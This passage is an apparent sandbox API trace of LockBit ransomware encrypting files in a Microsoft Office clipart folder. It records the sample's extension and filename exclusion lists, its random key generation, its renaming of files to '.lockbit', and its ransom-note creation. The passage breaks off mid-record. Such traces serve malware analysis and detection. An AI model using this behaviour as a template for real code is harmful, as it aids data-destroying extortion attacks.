[0178.536] lstrcmpiW (lpString1="ntldr", lpString2="TN00211_.WMF") returned -1 [0178.536] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00211_.WMF") returned -1 [0178.536] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00211_.WMF") returned -1 [0178.536] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00211_.WMF") returned -1 [0178.536] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00211_.WMF") returned -1 [0178.536] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00211_.WMF") returned -1 [0178.536] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0178.536] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF") returned=".WMF" [0178.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0178.536] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0178.536] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0178.537] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0178.537] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF.lockbit") returned 72 [0178.537] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00211_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0178.569] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0178.569] malloc (_Size=0x40068) returned 0x3df0008 [0178.569] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7186) returned 1 [0178.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0178.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0178.570] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0178.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0178.614] malloc (_Size=0xa6) returned 0x1fa2ed8 [0178.614] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0178.616] free (_Block=0x1fa2ed8) [0178.616] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00211_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0178.616] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0178.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0178.616] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1b4a700, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x5ae692f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd1b4a700, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x1224, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00217_.WMF", cAlternateFileName="")) returned 1 [0178.616] lstrcmpiW (lpString1=".", lpString2="TN00217_.WMF") returned -1 [0178.616] lstrcmpiW (lpString1="..", lpString2="TN00217_.WMF") returned -1 [0178.616] PathFindExtensionW (pszPath="TN00217_.WMF") returned=".WMF" [0178.616] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0178.616] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0178.617] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0178.617] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00217_.WMF") returned -1 [0178.618] lstrcmpiW (lpString1="ntldr", lpString2="TN00217_.WMF") returned -1 [0178.618] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00217_.WMF") returned -1 [0178.618] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00217_.WMF") returned -1 [0178.618] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00217_.WMF") returned -1 [0178.618] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00217_.WMF") returned -1 [0178.618] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00217_.WMF") returned -1 [0178.618] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0178.618] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF") returned=".WMF" [0178.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0178.618] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0178.618] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0178.619] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0178.619] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF.lockbit") returned 72 [0178.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00217_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0178.621] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0178.621] malloc (_Size=0x40068) returned 0x1ff1e60 [0178.621] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4644) returned 1 [0178.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0178.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0178.622] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0178.771] malloc (_Size=0xa6) returned 0x1fa2ed8 [0178.771] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0178.773] free (_Block=0x1fa2ed8) [0178.773] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00217_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0178.773] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0178.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0178.773] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x851c9c00, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x851c9c00, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x1bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00218_.WMF", cAlternateFileName="")) returned 1 [0178.773] lstrcmpiW (lpString1=".", lpString2="TN00218_.WMF") returned -1 [0178.773] lstrcmpiW (lpString1="..", lpString2="TN00218_.WMF") returned -1 [0178.773] PathFindExtensionW (pszPath="TN00218_.WMF") returned=".WMF" [0178.773] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0178.773] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0178.774] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0178.774] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00218_.WMF") returned -1 [0178.775] lstrcmpiW (lpString1="ntldr", lpString2="TN00218_.WMF") returned -1 [0178.775] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00218_.WMF") returned -1 [0178.775] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00218_.WMF") returned -1 [0178.775] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00218_.WMF") returned -1 [0178.775] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00218_.WMF") returned -1 [0178.775] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00218_.WMF") returned -1 [0178.775] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0178.775] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF") returned=".WMF" [0178.775] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0178.775] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0178.775] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0178.776] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0178.776] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF.lockbit") returned 72 [0178.776] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00218_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0178.777] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0178.777] malloc (_Size=0x40068) returned 0x3d70450 [0178.777] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7104) returned 1 [0178.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0178.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0178.778] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0179.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.290] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.290] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.292] free (_Block=0x1fa2ed8) [0179.292] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00218_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.292] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.292] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3399f000, ftCreationTime.dwHighDateTime=0x1bd4ae3, 